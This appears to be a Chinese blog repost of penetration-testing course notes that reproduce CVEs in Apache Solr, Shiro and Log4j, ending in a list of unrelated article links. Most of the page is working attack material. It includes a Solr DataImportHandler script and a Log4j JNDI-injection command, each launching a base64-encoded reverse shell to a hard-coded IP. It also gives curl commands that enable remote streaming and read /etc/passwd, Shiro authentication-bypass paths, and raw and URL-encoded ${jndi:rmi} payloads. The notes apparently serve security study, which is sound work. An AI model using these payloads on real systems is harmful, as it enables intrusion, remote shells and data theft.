当前位置: 首页 > news >正文

Day82:服务攻防-开发组件安全Solr搜索Shiro身份Log4j日志本地CVE环境复现

目录

J2EE-组件Solr-本地demo&CVE

命令执行(CVE-2019-17558)

远程命令执行漏洞(CVE-2019-0193)

Apache Solr 文件读取&SSRF (CVE-2021-27905)

J2EE-组件Shiro-本地demo&CVE

CVE_2016_4437 Shiro-550+Shiro-721(RCE)

CVE-2020-11989(身份认证绕过)

CVE-2020-1957(身份认证绕过)

CVE-2022-32532(身份验证绕过)

J2EE-组件Log4j-本地demo&CVE

Log4j2远程命令执行(CVE-2021-44228)


知识点:

1、J2EE-组件安全-Solr-全文搜索

2、J2EE-组件安全-Shiro-身份验证

3、J2EE-组件安全-Log4J-日志记录

常见语言开发框架:

  • PHP:Thinkphp Laravel YII CodeIgniter CakePHP Zend等
  • JAVA:Spring MyBatis Hibernate Struts2 Springboot等
  • Python:Django Flask Bottle Turbobars Tornado Web2py等
  • Javascript:Vue.js Node.js Bootstrap JQuery Angular等

常见语言开发组件:(Java):Apache Solr、Apache Shiro、Apache Struts2、Apache Flink、Flume、Dubbo、Redis、Logstash、ElasticSearch、Kafka、Ghidra、Minecraft、Apache hive、Datax、Streaming、Dolphin Scheduler、Storm、Spring、Aibaba FastJson、Jackson、Log4J、XSteam等。

J2EE-组件Solr-本地demo&CVE

主要基于HTTP和Apache Lucene实现的全文搜索服务器。

黑盒特征:图标及端口8983

命令执行(CVE-2019-17558)

影响版本:Apache Solr 5.0.0版本至8.3.1

利用项目:https://github.com/jas502n/solr_rce

D:\Python27\python.exe solr_rce.py http://123.58.236.76:50847 id

远程命令执行漏洞(CVE-2019-0193)

影响版本:Apache Solr < 8.2.0版本

https://vulhub.org/#/environments/solr/CVE-2019-0193/

条件1:Apache Solr的DataImportHandler启用了模块DataImportHandler(默认不会被启用)

条件2:Solr Admin UI未开启鉴权认证。(默认情况无需任何认证)

选择已有核心后选择Dataimport功能并选择debug模式,更改填入以下POC,点击Execute with this Confuguration

<dataConfig><dataSource type="URLDataSource"/><script><![CDATA[function poc(){ java.lang.Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}");}]]></script><document><entity name="stackoverflow"url="https://stackoverflow.com/feeds/tag/solr"processor="XPathEntityProcessor"forEach="/feed"transformer="script:poc" /></document>
</dataConfig>

Apache Solr 文件读取&SSRF (CVE-2021-27905)

全版本官方拒绝修复漏洞

获取数据库名

http://47.94.236.117:8983/solr/admin/cores?indexInfo=false&wt=json

访问触发

curl -i -s -k -X $'POST' \-H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \$'http://47.94.236.117:8983/solr/demo/config'

任意文件读取

curl -i -s -k 'http://47.94.236.117:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'

J2EE-组件Shiro-本地demo&CVE

Java安全框架,能够用于身份验证、授权、加密和会话管理。

黑盒特征:数据包cookie里面rememberMe

白盒审计:看调用的shiro库对应版本是否爆过漏洞

CVE_2016_4437 Shiro-550+Shiro-721(RCE)

影响范围:Apache Shiro <= 1.2.4

工具直接搜哈

CVE-2020-11989(身份认证绕过)

Poc:/admin/%20

影响范围:Apache Shiro < 1.7.1

CVE-2020-1957(身份认证绕过)

Poc:/xxx/..;/admin/

影响范围:Apache Shiro < 1.5.3

CVE-2022-32532(身份验证绕过)

Poc: /permit/any

/permit/a%0any可绕过,需要依赖代码具体写法,无法自动化,风险较低。

影响范围:Apache Shiro < 1.9.1

J2EE-组件Log4j-本地demo&CVE

Apache的一个开源项目,是一个基于Java的日志记录框架。

黑盒特征:盲打 会问蓝队攻击特征(${jndi:rmi:///osutj8})

Log4j2远程命令执行(CVE-2021-44228)

漏洞影响的产品版本包括:Apache Log4j2 2.0 - 2.15.0-rc1

修复

生成反弹Shell的JNDI注入

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3Lzk5MDAgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 47.94.236.117

构造JNDI注入Payload提交

${jndi:rmi://47.94.236.117:1099/osutj8}

%24%7b%6a%6e%64%69%3a%72%6d%69%3a%2f%2f%34%37%2e%39%34%2e%32%33%36%2e%31%31%37%3a%31%30%39%39%2f%6f%73%75%74%6a%38%7d

http://www.lryc.cn/news/332540.html

相关文章:

  • 网络协议——VRRP(虚拟路由冗余协议)原理与配置
  • Elasticsearch:我们如何演化处理二进制文档格式
  • 第八讲 Sort Aggregate 算法
  • clickhouse MPPDB数据库--新特性使用示例
  • MATLAB多级分组绘图及图例等细节处理 ; MATLAB画图横轴时间纵轴数值按照不同sensorCode分组画不同sensorCode的曲线
  • 20240405,数据类型,运算符,程序流程结构
  • Prometheus+grafana环境搭建Nginx(docker+二进制两种方式安装)(六)
  • 贝叶斯逻辑回归
  • Win10 下 Vision Mamba(Vim-main)的环境配置(libcuda.so文件无法找到,windows系统运行失败)
  • 4 万字全面掌握数据库、数据仓库、数据集市、数据湖、数据中台
  • Leetcode 64. 最小路径和
  • FANUC机器人故障诊断—报警代码更新(三)
  • mysql 本地电脑服务部署
  • 爬虫学习第一天
  • labview如何创建2D多曲线XY图和3D图
  • 【华为OD机试】芯片资源限制(贪心算法—JavaPythonC++JS实现)
  • 服务器硬件构成与性能要点:CPU、内存、硬盘、RAID、网络接口卡等关键组件的基础知识总结
  • STC89C51学习笔记(四)
  • Arcgis Pro地理配准
  • 数字转型新动力,开源创新赋能数字经济高质量发展
  • 解决JavaWeb中IDEA2023新版本无法创建Servlet的问题
  • 关于oracle切换mysql8总结
  • Docker 容器编排技术解析与实践
  • 微信小程序 ---- 慕尚花坊 订单列表
  • Tuxera2023 NTFS for Mac下载,安装和序列号激活
  • 移动Web学习04-移动端订单结算页PC端个人中心页面
  • Linux基础篇:Linux网络yum源——以配置阿里云yum源为例
  • 2024.2.10力扣每日一题——二叉树的中序遍历
  • MVP惊现神秘买家,或疑为华尔街传奇投资人?
  • 观察者模式 C++